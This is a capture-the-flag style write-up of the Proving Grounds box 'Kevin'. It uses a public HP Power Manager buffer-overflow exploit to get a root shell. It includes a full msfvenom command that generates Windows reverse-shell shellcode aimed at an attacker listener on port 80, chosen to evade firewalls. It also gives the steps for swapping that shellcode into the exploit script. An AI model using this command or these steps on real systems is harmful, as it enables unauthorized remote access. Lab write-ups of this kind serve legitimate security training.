Kevin is an easy box from Proving Grounds that exploits a buffer overflow vulnerability in HP Power Manager to gain root in one step.
Before the nmap scan even finishes we can open the IP address in a browser and find a landing page with a login form for HP Power Manager.
A quick searchsploit for ‘HP Power Manager’ reveals several exploits, the most promising of which is a python script titled “Hewlett-Packard (HP) Power Manager Administration Power Manager Administration – Universal Buffer Overflow”.
Opening the script reveals the command we need to use to generate our remote shell code.
We need to replace the text in the
SHELL variable with our own shell code (except for the
n00bnoob string), using the values given in the comments above. The full command to generate this shell code is:
msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=192.168.49.100 LPORT=80 -e x86/alpha_mixed -f c
This will generate output as shown below:
We can replace everything in the
SHELL variable of exploit script after
n00bn00b with our own code, open a listener and run the exploit to get a reverse shell back as root.
The exploit is pre-set to return a shell on port 4444, but I chose to use port 80 to avoid firewalls.
Kevin is a great box for beginners and those who don’t have much experience with buffer overflows. As with all buffer overflows, you may need to restart the box if you don’t get a shell back on your first attempt as the program will have likely crashed and won’t be exploitable without a restart.